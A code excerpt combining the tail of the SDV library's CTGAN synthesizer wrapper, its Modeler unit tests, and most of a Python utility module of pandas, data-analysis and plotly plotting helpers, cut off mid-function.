epochs=300, log_frequency=True, embedding_dim=128, gen_dim=(256, 256),
dis_dim=(256, 256), l2scale=1e-6, batch_size=500):
super().__init__(
field_names=field_names,
primary_key=primary_key,
field_types=field_types,
anonymize_fields=anonymize_fields,
constraints=constraints,
table_metadata=table_metadata
)
try:
from ctgan import CTGANSynthesizer # Lazy import to make dependency optional
self._CTGAN_CLASS = CTGANSynthesizer
except ImportError as ie:
ie.msg += (
'\n\nIt seems like `ctgan` is not installed.\n'
'Please install it using:\n\n pip install sdv[ctgan]'
)
raise
self._embedding_dim = embedding_dim
self._gen_dim = gen_dim
self._dis_dim = dis_dim
self._l2scale = l2scale
self._batch_size = batch_size
self._epochs = epochs
self._log_frequency = log_frequency
def _fit(self, table_data):
"""Fit the model to the table.
Args:
table_data (pandas.DataFrame):
Data to be learned.
"""
self._model = self._CTGAN_CLASS(
embedding_dim=self._embedding_dim,
gen_dim=self._gen_dim,
dis_dim=self._dis_dim,
l2scale=self._l2scale,
batch_size=self._batch_size,
)
categoricals = [
field
for field, meta in self._metadata.get_fields().items()
if meta['type'] == 'categorical'
]
self._model.fit(
table_data,
epochs=self._epochs,
discrete_columns=categoricals,
log_frequency=self._log_frequency,
)
def _sample(self, num_rows):
"""Sample the indicated number of rows from the model.
Args:
num_rows (int):
Amount of rows to sample.
Returns:
pandas.DataFrame:
Sampled data.
"""
return self._model.sample(num_rows)
```
#### File: SDV/tests/test_modeler.py
```python
from unittest import TestCase
from unittest.mock import Mock, call
import pandas as pd
from sdv.metadata import Metadata
from sdv.modeler import Modeler
from sdv.models.base import SDVModel
from sdv.models.copulas import GaussianCopula
class TestModeler(TestCase):
def test___init__default(self):
"""Test create new Modeler instance with default values"""
# Run
modeler = Modeler('test')
# Asserts
assert modeler.models == dict()
assert modeler.metadata == 'test'
assert modeler.model == GaussianCopula
assert modeler.model_kwargs == dict()
def test___init__with_arguments(self):
# Run
model = Mock()
modeler = Modeler({'some': 'metadata'}, model=model, model_kwargs={'some': 'kwargs'})
# Asserts
assert modeler.models == dict()
assert modeler.metadata == {'some': 'metadata'}
assert modeler.model == model
assert modeler.model_kwargs == {'some': 'kwargs'}
def test__get_extensions(self):
"""Test get list of extensions from childs"""
# Setup
model = Mock(spec=SDVModel)
model.return_value = model
model.get_parameters.side_effect = [
{'model': 'data 1'},
{'model': 'data 2'},
{'model': 'data 3'}
]
modeler = Mock(spec=Modeler)
modeler.model = model
modeler.model_kwargs = dict()
modeler.metadata = Mock(spec=Metadata)
# Run
child_table = pd.DataFrame({'foo': ['aaa', 'bbb', 'ccc']})
result = Modeler._get_extension(modeler, 'some_name', child_table, 'foo')
# Asserts
expected = pd.DataFrame({
'__some_name__model': ['data 1', 'data 2', 'data 3'],
'__some_name__child_rows': [1, 1, 1]
}, index=['aaa', 'bbb', 'ccc'])
pd.testing.assert_frame_equal(result, expected)
assert model.get_parameters.call_count == 3
def test_cpa_with_tables_no_primary_key(self):
"""Test CPA with tables and no primary key."""
# Setup
modeler = Mock(spec=Modeler)
modeler.metadata = Mock(spec=Metadata)
modeler.model = Mock(spec=SDVModel)
modeler.model_kwargs = dict()
modeler.models = dict()
modeler.table_sizes = {'data': 5}
modeler.metadata.transform.return_value = pd.DataFrame({'data': [1, 2, 3]})
modeler.metadata.get_primary_key.return_value = None
# Run
tables = {'test': pd.DataFrame({'data': ['a', 'b', 'c']})}
result = Modeler.cpa(modeler, 'test', tables)
# Asserts
expected = pd.DataFrame({'data': [1, 2, 3]})
expected_transform_call = pd.DataFrame({'data': ['a', 'b', 'c']})
assert modeler.metadata.load_table.call_count == 0
assert modeler.metadata.transform.call_args[0][0] == 'test'
pd.testing.assert_frame_equal(
modeler.metadata.transform.call_args[0][1],
expected_transform_call
)
pd.testing.assert_frame_equal(result, expected)
def test_model_database(self):
"""Test model using RCPA"""
# Setup
def rcpa_side_effect(table_name, tables):
tables[table_name] = table_name
metadata_table_names = ['foo', 'bar', 'tar']
metadata_parents = [None, 'bar_parent', None]
modeler = Mock()
modeler.metadata.get_tables.return_value = metadata_table_names
modeler.metadata.get_parents.side_effect = metadata_parents
modeler.rcpa.side_effect = rcpa_side_effect
modeler.models = dict()
# Run
Modeler.model_database(modeler)
# Asserts
expected_metadata_parents_call_count = 3
expected_metadata_parents_call = [call('foo'), call('bar'), call('tar')]
assert modeler.metadata.get_parents.call_count == expected_metadata_parents_call_count
assert modeler.metadata.get_parents.call_args_list == expected_metadata_parents_call
``` |
{
"source": "joanvelro/IA_resources",
"score": 3
} |
#### File: joanvelro/IA_resources/dl_ia_utils.py
```python
def dl_ia_utils_change_directory(path):
"""
path ='path/to/app/'
"""
import os
new_path = os.path.dirname(os.path.dirname(__file__))
new_path = os.chdir(path)
import sys
sys.path.insert(1, path)
def dl_ia_utils_set_up_logger(path):
""" Set up logger
:arg path: path where to store logs example: 'logs\\dl-ia-cla-predictive'
"""
import logging
logger = logging.getLogger(path)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('{}.log'.format(path))
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
logging.getLogger().addHandler(logging.StreamHandler()) # to display in console message
# logger.debug('mensaje debug')
# logger.info('mensaje info')
# logger.warning('mensaje warning')
# logger.error('mensaje error')
# logger.critical('mensaje critical')
def dl_ia_utils_systems_info():
""" Function that shows the system properties
"""
import sys
from platform import python_version
print('Python version:{}'.format(python_version()))
print('Python system version:{}'.format(sys.version))
print('Path:{}'.format(sys.executable))
print('Python version info:{}'.format(sys.version_info))
def dl_ia_utils_config_plotly():
""" this function configures the plotly visualization
:return:
"""
import plotly.io as pio
import plotly.graph_objects as go
import plotly.express as px
pio.renderers.default = "browser"
def dl_ia_utils_config_matplotlib():
""" this function configures the matplotlib style
:return:
"""
from matplotlib import rc
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})
rc('font', **{'family': 'serif', 'serif': ['Times']})
rc('text', usetex=True)
def dl_ia_utils_config_pandas():
"""
Allows to show all the columns of a dataframe in the console
Limit pandas warnings
"""
import pandas as pd
import numpy as np
pd.options.mode.chained_assignment = None # default='warn'
desired_width = 350
np.set_printoptions(linewidth=desired_width) # show dataframes in console
pd.set_option('display.max_columns', 10)
def dl_ia_utils_check_folder(path_folder):
""" check that exists a folder, and if not, create it
:param path_folder: string with the path
:return error: error code (0:good, 1:bad)
"""
import os
error = 0
try:
if not os.path.isdir(path_folder):
print('Creating folder: {} '.format(path_folder))
os.mkdir(path_folder)
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_check_folder: ' + str(exception_msg))
error = 1
return error
#############################################################
# ---------- DATA ANALYSIS ---------------------------------#
#############################################################
def dl_ia_utils_memory_usage(df):
""" Calculate and print the memory usage and shape by the dataframe
:param df:
:return:
"""
error = 0
try:
print('{} Data Frame Memory usage: {:2.2f} GB'.format('-' * 20, df.memory_usage(deep=True).sum() / 1000000000))
print('{} Data Frame Shape: {} '.format('-' * 20, df.shape))
except Exception as exception_msg:
error = 1
print('(!) Error in dl_ia_utils_memory_usage: ' + str(exception_msg))
return error
def dl_ia_utils_filter_by_std(df, variable, option):
if option == 2:
df_aux = df[(df[variable] < (df[variable].mean() + 2 * df[variable].std()))
& (df[variable] > (df[variable].mean() - 2 * df[variable].std()))]
elif option == 1:
df_aux = df[(df[variable] < (df[variable].mean() + df[variable].std()))
& (df[variable] > (df[variable].mean() - df[variable].std()))]
print('Rows dropped:{} %'.format(round(100 * (1 - (len(df_aux) / len(df))), 3)))
return df_aux
def dl_ia_utils_subs_zeros_values(y):
""" subs zero values from from an array by values close to zeros 1e-10
e.g.: y = np.array([1,4,2,3,7,8,0,0,8,7,0,0,9,8])
:param y:
:return:
"""
import pandas as pd
df = pd.DataFrame({'y': y})
df.loc[df['y'] == 0, ['y']] = 1e-9
return df['y'].values
def dl_ia_utils_create_datestring(row):
"""
df['date'] = df.apply(lambda row: create_date(row), axis=1)
"""
try:
return row['TIMESTAMP'].strftime('%Y-%m-%d')
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_datestring: ' + str(exception_msg))
def dl_ia_utils_create_time_array(start, end, freq):
""" function that creates an array of times
:param start: string with the initial time (e.g.: 00:00:00)
:param end: string with the end time (e.g.: 23:59:59)
:parm freq: string indicating the frequency (e.g.: 15min)
:return: array of time
"""
t = pd.DataFrame({'t': pd.date_range(start=start, end=end, freq=freq)}).t.dt.date
return t
def dl_ia_utils_create_date(row):
""" create date with year, month and day
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import pandas as pd
try:
return pd.Timestamp(int(row['YEAR']), int(row['MONTH']), int(row['DAY']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_date: ' + str(exception_msg))
def dl_ia_utils_create_time(row):
""" convert values of HOUR and MINUTE to datetime
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import datetime
try:
return datetime.time(int(row['HOUR']), int(row['MINUTE']), int(row['SECOND']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_time: ' + str(exception_msg))
def dl_ia_utils_create_timestamp(row):
""" create date with year, month and day
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import pandas as pd
try:
return pd.Timestamp(int(row['YEAR']), int(row['MONTH']), int(row['DAY']), int(row['HOUR']), int(row['MINUTE']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_timestamp: ' + str(exception_msg))
def dl_ia_utils_create_datetime(row):
""" create datetime with hour and minute
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import datetime
try:
return datetime.time(int(row['HOUR']), int(row['MINUTE']))
except Exception as exception_msg:
print('(!) Error in dl_ia_conn_utils_create_datetime: ' + str(exception_msg))
def dl_ia_utils_read_csv_per_chunks(path):
""" This function read a large csv file into a dataframe per chunks
:param path:
:return df: dataframe
"""
import pandas as pd
chunksize_ = 1000
error = 0
try:
TextFileReader = pd.read_csv(path, sep=";", chunksize=chunksize_)
dfList = []
for df in TextFileReader:
dfList.append(df)
df = pd.concat(dfList, sort=False)
return error, df
except Exception as exception_msg:
print("Error in read_csv_per_chunks {}".format(exception_msg))
# raise
error = 1
df = []
return error, df
def dl_ia_utils_vertical_translation(y):
""" detects in exist a zero value and translate the time series with the minimum value
:param y:
:return:
"""
import numpy as np
if np.isin(0, y):
# exists a zero value, find the minimum distinct from zero
delta = np.min(y[y > 0])
# vertical translation
# ym = y + delta
ym = y + 1
return ym
return y
def dl_ia_utils_get_unique_values(df_in):
""" this function calculate the unique values of the column of a data frame
:param df_in: dataframe with the columns of interest
:return dict_out: dictionary with unique values of the columns
"""
import numpy as np
dict_out = dict()
for column in df_in.columns:
dict_out[column] = np.sort(df_in[column].unique())
return dict_out
def dl_ia_utils_quarter_classify(x):
""" classify a variabel x into four cuadrants
:param x: value with values in (0,60)
:return y: values with values in (1,2,3,4)
"""
if x <= 15:
y = 0
if 30 >= x > 15:
y = 15
if 45 >= x > 30:
y = 30
if x > 45:
y = 45
return y
def dl_ia_utils_quarter_groups(x):
""" classify a variabel x into four cuadrants
:param x: value with values in (0,60)
:return y: values with values in (1,2,3,4)
"""
if x <= 15:
y = 1
if 30 >= x > 15:
y = 2
if 45 >= x > 30:
y = 3
if x > 45:
y = 4
return y
def dl_ia_utils_check_null_values(df):
"""
:param df:
:return df:
"""
# check nans
if df.isna().sum().sum() > 0:
print('(!) NAN Values detected')
print(df.isna().sum())
df.dropna(inplace=True)
return df
elif df.isnull().sum().sum() > 0:
print('(!) NULLs Values detected')
print(df.isnull().sum())
df.dropna(inplace=True)
return df
else:
print('Everything ok')
return df
def dl_ia_utils_comm(msg):
""" Funtion to show mesages in terminal
:parm msg: meassge (str)
:return:
"""
print('{} {}'.format('-' * 20, msg))
def dl_ia_utils_quarter_classify(x):
""" classify a variabel x into four cuadrants
:param x: value with values in (0,60)
:return y: values with values in (1,2,3,4)
"""
if x <= 15:
y = 0
if 30 >= x > 15:
y = 15
if 45 >= x > 30:
y = 30
if x > 45:
y = 45
return y
#############################################################
# ------------------- EDA ---------------------------------#
#############################################################
def dl_ia_utils_check_descriptive_statistics(df):
""" calculate descriptive statiscs of a dataframe columns
:param df: dataframe with columns of interest
:return error: error code (0:ok, 1: something wrong)
"""
error = 0
try:
for variable in df.columns:
print('variable:{}{}'.format(' ' * 2, variable))
print('---------------')
print('Mean Value:{}{}'.format(' ' * 2, round(df[variable].mean(), 2)))
print('std Value:{}{}'.format(' ' * 3, round(df[variable].std(), 2)))
print('Q3.:{}{}'.format(' ' * 9, round(df[variable].quantile(0.75), 2)))
print('Max.:{}{}'.format(' ' * 8, round(df[variable].max(), 2)))
print('Q2 :{}{}'.format(' ' * 2, round(df[variable].median(), 2)))
print('Min.:{}{}'.format(' ' * 8, round(df[variable].min(), 2)))
print('Q1.:{}{}'.format(' ' * 9, round(df[variable].quantile(0.25), 2)))
print('IQR.:{}{}'.format(' ' * 8, round(df[variable].quantile(0.75) - df0[variable].quantile(0.25), 2)))
return error
except Exception as exception_msg:
print('{} (!) Error in dl_ia_utils_check_descriptive_statistics: '.format('-' * 20) + str(exception_msg))
error = 1
return error
#############################################################
# ------------------ PLOTS ---------------------------------#
#############################################################
def dl_ia_utils_plot_timeseries(df, var_x, var_y):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.graph_objects as go
show = True
print_ = True
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y],
marker=dict(color='red'),
mode='markers+lines',
name=var_y))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Time series',
xaxis_title=var_x,
yaxis_title=var_y,
showlegend=True
)
if show:
fig.show()
if print_:
fig.write_html("figures\\timeseries_{}.html".format(var_y))
def dl_ia_utils_plot_line(df, var_x, var_y, var_group):
"""
:param df:
:param var_x:
:param var_y:
:param var_group:
:return:
"""
import plotly.express as px
show = True
print_ = True
fig = px.line(df,
x=var_x,
y=var_y,
color=var_group,
)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\line_plot_simple_{}_{}.html".format(var_x, var_y))
def dl_ia_utils_plot_marginal_dist_plot(df, var_x, var_y):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.express as px
show = True
print_ = True
fig = px.density_heatmap(df,
x=var_x, # title="Click on the legend items!"
y=var_y, # add color="species",
marginal_x="box", # histogram, rug
marginal_y="violin")
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\plot_marginal_dist_plot_{}_{}.html".format(var_x, var_y))
def dl_ia_utils_plot_scatter_with_facets(df, var_x, var_y, var_color, var_group):
"""
:param df:
:param var_x:
:param var_y:
:param var_color:
:param var_group:
:return:
"""
import plotly.express as px
show = True
print_ = True
fig = px.scatter(df,
x=var_x,
y=var_y,
color=var_color,
facet_col=var_group,
marginal_x="box") # violin, histogram, rug
fig.update_layout(font=dict(family="Courier New, monospace",
size=18,
color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\plot_scatter_with_facets_{}_{}_{}_{}.html".format(var_x, var_y, var_color, var_group))
def dl_ia_utils_plot_multi_timeseries():
start = '2018-05-01 00:00:00'
end = '2018-05-15 00:00:00'
df_aux = df[(df['DATE'] > start) & (df['DATE'] < end)]
fig = go.Figure()
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICULOS'] * 4,
name='Real'))
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICULOS_DESCRIPTIVE'] * 4,
name='Descriptive Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_desc, MAE_desc)))
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICLES_RF_PREDICTION'] * 4,
name='Random Forest Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_rf,
MAE_rf)))
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICLES_NN_PREDICTION'] * 4,
mode='lines',
marker_color='rgba(152, 0, 0, .8)',
name='Neural Network Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_nn,
MAE_nn)))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Predictive results - Segment: {} - Dates: {} to {}'.format(segments[seg],
start[0:10],
end[0:10]),
xaxis_title='Time (15 min. resolution)',
yaxis_title='Flow (veh./h)',
showlegend=True
)
fig.update_layout(legend=dict(x=0, y=-0.5, bgcolor="white"))
fig.show()
def dl_ia_utils_plot_multi_timeseries_with_slider():
fig = go.Figure()
fig.add_trace(go.Scatter(x=df['DATE'],
y=df['TOTAL_VEHICULOS'],
name='Real Data'))
fig.add_trace(go.Scatter(x=df['DATE'],
y=df['TOTAL_VEHICULOS_DESCRIPTIVE'],
name='Descriptive Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_desc, MAE_desc)))
fig.add_trace(go.Scatter(x=df['DATE'],
y=df['TOTAL_VEHICLES_RF_PREDICTION'],
name='Random Forest Predictive Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_rf,
MAE_rf)))
# Set x-axis title
fig.update_xaxes(title_text="Time")
# Set y-axes titles
fig.update_yaxes(title_text="Total Vehicles")
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='AUSOL - Road Traffic Flow - Segment: {}'.format(segments[seg]),
showlegend=True
)
fig.update_layout(legend=dict(x=0, y=-1.0, bgcolor="white"))
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeslider=dict(
visible=True
),
type="date"
)
)
fig.show()
def dl_ia_utils_plot_histogram(df, variable, n_bins_, label):
""" plot a histogram using plotly from a vairable in a dataframe
:param df: Data frame with the variable
:param variable: name of the variable (column name)
:param n_bins_: number of bins of the histogram
:param label: string with a name for the title
:return error: error code 0: everything ok, 1: something happened
"""
import plotly.express as px
import numpy as np
print_ = True
show = True
fontsize_ = 18
error = 0
try:
max_value = int(df[variable].max())
x_axis = np.arange(0, max_value, int(max_value / 20))
fig = px.histogram(df, x=variable, nbins=n_bins_, marginal="box")
fig.update_xaxes(title_text=variable)
fig.update_layout(font=dict(family="Courier New, monospace", size=fontsize_, color="#7f7f7f"))
fig.update_layout(title='Histogram - {} - {}'.format(label, variable))
fig.update_layout(showlegend=True)
fig.update_traces(opacity=0.9)
fig.update_layout(bargap=0.2) # gap between bars of adjacent location coordinates
fig.update_xaxes(ticktext=x_axis, tickvals=x_axis)
if print_:
fig.write_html("figures\\plot_histogram_{}.html".format(variable))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in plot_histogram: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_time_series_plot(time_index, y1, label1, title):
""" Plot one single time series
:param time_index:
:param y1:
:param y2:
:param label1:
:param label2:
:return:
"""
import plotly.graph_objects as go
print_ = True
show = True
# title = 'time_series_comparison'
fig = go.Figure()
fig.add_trace(go.Scatter(x=time_index,
y=y1,
mode='markers+lines',
marker=dict(color='red'),
name='{}'.format(label1)))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=label1)
fig.update_xaxes(title_text='Time')
fig.update_layout(title=title)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1 day",
step="day",
stepmode="backward"),
dict(count=3,
label="3 day",
step="day",
stepmode="backward"),
dict(count=7,
label="1 week",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if print_:
fig.write_html("figures\\time_series_{}.html".format(label1))
if show:
fig.show()
def dl_ia_utils_time_series_comparison(time_index, y1, y2, label1, label2, title):
""" Plot two time series with the same time index
:param time_index:
:param y1:
:param y2:
:param label1:
:param label2:
:return:
"""
import plotly.graph_objects as go
print_ = True
show = True
# title = 'time_series_comparison'
error = 0
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=time_index,
y=y1,
mode='markers+lines',
marker=dict(color='red'),
name='{}'.format(label1)))
fig.add_trace(go.Scatter(x=time_index,
y=y2,
mode='markers+lines',
marker=dict(color='blue'),
name='{}'.format(label2)))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=label1)
fig.update_xaxes(title_text='Time')
fig.update_layout(title=title)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1 day",
step="day",
stepmode="backward"),
dict(count=3,
label="3 day",
step="day",
stepmode="backward"),
dict(count=7,
label="1 week",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if print_:
fig.write_html("figures\\time_series_comparison_{}_{}.html".format(label1, label2))
if show:
fig.show()
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_time_series_comparison: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_scatterplot_simple(df, var_x, var_y, label, title_):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param variable_to_color: variable to use as color
:param variable_to_color: variable to use as size
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='{} - {}'.format(title_, label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\{}_{}_{}_{}.html".format(title_, label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot_simple: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_scatterplot(df, var_x, var_y, var_color, var_size, label):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param variable_to_color: variable to use as color
:param variable_to_color: variable to use as size
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
size=var_size,
color=var_color)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Scatterplot - {}'.format(label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\scatterplot_{}_{}_{}.html".format(label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_three_timeseries(df, var_x, var_y1, var_y2, var_y3,
title_, y_label):
""" Plot two time series
:df param: data frame with data
:var_x param: string with x-axis variable. The name is used as label
:var_y1 param: string with first time series to plot. The name is used as axis label
:var_y2 param: string with second time series to plot
:var_y3 param: string with third time series to plot
:title_ param: string with the desired title. It is used to save the html file
:label_y1 param: string for the legend of time series 1
:label_y2 param: string for the legend of time series 2
:return: error
"""
import plotly.graph_objects as go
import plotly.io as pio
import plotly.express as px
# by default in showed in browser, change to 'notebook' if you want
pio.renderers.default = "browser"
show = True
print_ = True
error = 0
custom_x_axis = False
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y1],
line=dict(width=2, dash='dot'),
marker=dict(color='black'),
mode='markers+lines',
name=var_y1))
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y2],
line=dict(width=2, dash='dot'),
mode='markers+lines',
marker=dict(color='blue'),
name=var_y2))
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y3],
line=dict(width=2, dash='dot'),
mode='markers+lines',
marker=dict(color='red'),
name=var_y3))
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.0,
xanchor="right",
x=0.4
))
fig.update_layout(font=dict(family="Courier New, monospace", size=16, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=y_label)
fig.update_xaxes(title_text=var_x)
fig.update_layout(title=title_)
# fig.update_layout(legend_orientation="h")
### update x ticks label
if custom_x_axis:
fig.update_layout(
xaxis=dict(
tickmode='array',
tickvals=df[var_x],
ticktext=df[var_x]
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}.html".format(title_))
return error
except Exception as exception_msg:
error = 1
print('(!) Error in dl_ia_utils_plot_three_timeseries: ' + str(exception_msg))
return error
def dl_ia_utils_plot_two_timeseries(df, var_x, var_y1, var_y2, title_, y_label):
""" Plot two time series
:df param: data frame with data
:var_x param: string with x-axis variable. The name is used as label
:var_y1 param: string with first time series to plot. The name is used as axis label
:var_y2 param: string with second time series to plot
:title_ param: string with the desired title. It is used to save the html file
:label_y1 param: string for the legend of time series 1
:label_y2 param: string for the legend of time series 2
:return: error
"""
import plotly.graph_objects as go
import plotly.io as pio
import plotly.express as px
from IA_resources.dl_ia_utils import dl_ia_utils_config_plotly
dl_ia_utils_config_plotly()
# by default in showed in browser, change to 'notebook' if you want
pio.renderers.default = "browser"
show = True
print_ = True
error = 0
custom_x_axis = False
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y1],
line=dict(width=2, dash='dot'),
marker=dict(color='black'),
mode='markers+lines',
name=var_y1))
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y2],
line=dict(width=2, dash='dot'),
mode='markers+lines',
marker=dict(color='blue'),
name=var_y2))
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.0,
xanchor="right",
x=0.4
))
fig.update_layout(font=dict(family="Courier New, monospace", size=16, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=y_label)
fig.update_xaxes(title_text=var_x)
fig.update_layout(title=title_)
# fig.update_layout(legend_orientation="h")
### update x ticks label
if custom_x_axis:
fig.update_layout(
xaxis=dict(
tickmode='array',
tickvals=df[var_x],
ticktext=df[var_x]
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}.html".format(title_))
return error
except Exception as exception_msg:
error = 1
print('(!) Error in dl_ia_utils_plot_two_timeseries: ' + str(exception_msg))
return error
def dl_ia_utils_plot_contour(df, title, x_label, y_label):
"""
:return:
"""
import plotly.graph_objects as go
import plotly.io as pio
import plotly.express as px
from IA_resources.dl_ia_utils import dl_ia_utils_config_plotly
dl_ia_utils_config_plotly()
# by default in showed in browser, change to 'notebook' if you want
pio.renderers.default = "browser"
try:
fig = go.Figure(data=
go.Contour(
z=df.values,
x=list(range(df.shape[1])), # horizontal axis
y=list(range(df.shape[0])), # vertical axis
line_smoothing=0.85,
contours=dict(
showlabels=True, # show labels on contours
start=0,
end=18,
size=1)
))
fig.update_layout(title=title,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.index
),
xaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.columns,
tickangle=90,
tickfont=dict(size=9)
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=10))
fig.show()
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_contour: ' + str(exception_msg))
def dl_ia_utils_plot_heatmap(df, title, x_label, y_label, x_ticks, y_ticks):
""" Plot heatmap
:df param: dataframe to plot
:title param: string with the title
:x_label param: string with the label of the x axis
:y_label param: string with the label of the y axis
:x_ticks param: list with the ticks of the x axis
:y_ticks param: list with the ticks of the y axis
:return:
"""
import plotly.express as px
import numpy as np
from IA_resources.dl_ia_utils import dl_ia_utils_config_plotly
dl_ia_utils_config_plotly()
try:
fig = px.imshow(df.values)
fig.update_layout(title=title,
yaxis_title=y_label,
xaxis_title=x_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(y_ticks)),
ticktext=y_ticks
),
xaxis=dict(
tickvals=np.arange(0, len(x_ticks)),
ticktext=x_ticks
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=11))
fig.show()
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_heatmap: ' + str(exception_msg))
def dl_ia_utils__plot_line(df, var_x, var_y, var_color, x_label, y_label, title_):
""" Plot line plot from dataframe
:param df:
:param var_x:
:param var_y:
:param x_label:
:param y_label:
:param title_:
"""
if var_color == None:
fig = px.line(df,
x=var_x,
y=var_y)
else:
fig = px.line(df,
x=var_x,
y=var_y,
color=var_color)
fig.update_layout(title=title_,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=14))
fig.show()
def dl_ia_utils_plot_scatter(df, var_x, var_y, var_color, x_label, y_label, title_):
""" Plot scatter plot from dataframe
:param df:
:param var_x:
:param var_y:
:param x_label:
:param y_label:
:param title_:
"""
if var_color == None:
fig = px.scatter(df,
x=var_x,
y=var_y)
else:
fig = px.scatter(df,
x=var_x,
y=var_y,
color=var_color)
fig.update_layout(title=title_,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=14))
fig.show()
def dl_ia_utils_plot_contour(df, title, x_label, y_label):
"""
:return:
"""
import plotly.graph_objects as go
fig = go.Figure(data=
go.Contour(
z=df.values,
